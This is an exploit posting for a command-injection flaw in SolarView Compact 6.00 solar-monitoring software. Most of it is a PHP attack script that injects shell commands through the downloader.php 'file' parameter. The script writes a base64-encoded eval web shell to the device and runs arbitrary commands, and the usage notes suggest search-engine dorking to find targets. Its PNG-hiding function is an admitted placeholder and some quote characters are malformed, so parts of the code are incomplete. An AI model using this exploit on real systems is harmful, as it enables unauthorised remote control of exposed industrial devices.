Headline
SolarView Compact 6.00 Code Injection
SolarView Compact version 6.00 suffers from a PHP code injection vulnerability.
=============================================================================================================================================
| # Title : SolarView Compact 6.00 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.contec.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 112 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class SolarViewExploit {
private $targetUri;
private $webshellName;
private $postParam;
private $timeout;
public function __construct($targetUri, $timeout = 40) {
$this->targetUri = rtrim($targetUri, '/');
$this->timeout = $timeout;
}
public function uploadWebshell($webshell = null) {
// Randomize file name if option WEBSHELL is not set
$this->webshellName = $webshell ?? $this->generateRandomFileName();
$this->postParam = $this->generateRandomString(8);
// Inject PHP payload into the PLTE chunk of a PNG image to hide the payload
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
$pngWebshell = $this->injectPhpPayloadPng($phpPayload);
if ($pngWebshell === null) {
return null;
}
// Encode webshell data and write to file on the target at the tmp directory for execution
$payload = base64_encode($pngWebshell);
$cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";
return $this->executeCommand($cmd);
}
public function executePhp($cmd) {
$payload = base64_encode($cmd);
return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [
$this->postParam => $payload
]);
}
public function executeCommand($cmd) {
// Encode payload with base64 to ensure proper execution
$payload = base64_encode($cmd);
$cmd = "echo {$payload}|base64 -d|bash";
return $this->sendRequest('GET', '/downloader.php', [
'file' => ";{$cmd};.zip"
]);
}
public function check() {
// Checking if the target is vulnerable by echoing a randomised marker
echo "Checking if {$this->targetUri} can be exploited.\n";
$marker = $this->generateRandomString(16);
$res = $this->executeCommand("echo {$marker};cat /opt/svc/version");
if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {
if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {
return "Vulnerable: " . $matches[0];
}
}
return 'Safe: No valid response received from the target.';
}
public function exploit($payload) {
echo "Executing payload on {$this->targetUri}.\n";
$res = $this->uploadWebshell();
if (!$res || $res['code'] !== 200) {
throw new Exception('Web shell upload error.');
}
$this->executePhp($payload);
}
private function sendRequest($method, $uri, $params) {
$url = $this->targetUri . $uri;
$options = [
'http' => [
'method' => $method,
'header' => 'Content-Type: application/x-www-form-urlencoded',
'timeout' => $this->timeout,
'content' => http_build_query($params)
]
];
$context = stream_context_create($options);
$response = @file_get_contents($url, false, $context);
$code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;
return [
'code' => $code,
'body' => $response
];
}
private function injectPhpPayloadPng($phpPayload) {
// Here you would implement the logic to inject the PHP payload into a PNG file.
// This is a placeholder implementation.
return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.
}
private function generateRandomFileName($length = 16) {
return bin2hex(random_bytes($length / 2)) . '.php';
}
private function generateRandomString($length) {
return bin2hex(random_bytes($length / 2));
}
}
// Example of usage
$targetUri = 'http://target-ip’; // Replace with the actual target URL
$exploit = new SolarViewExploit($targetUri);
echo $exploit->check();
$exploit->exploit(‘whoami’); // Replace with your payload
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================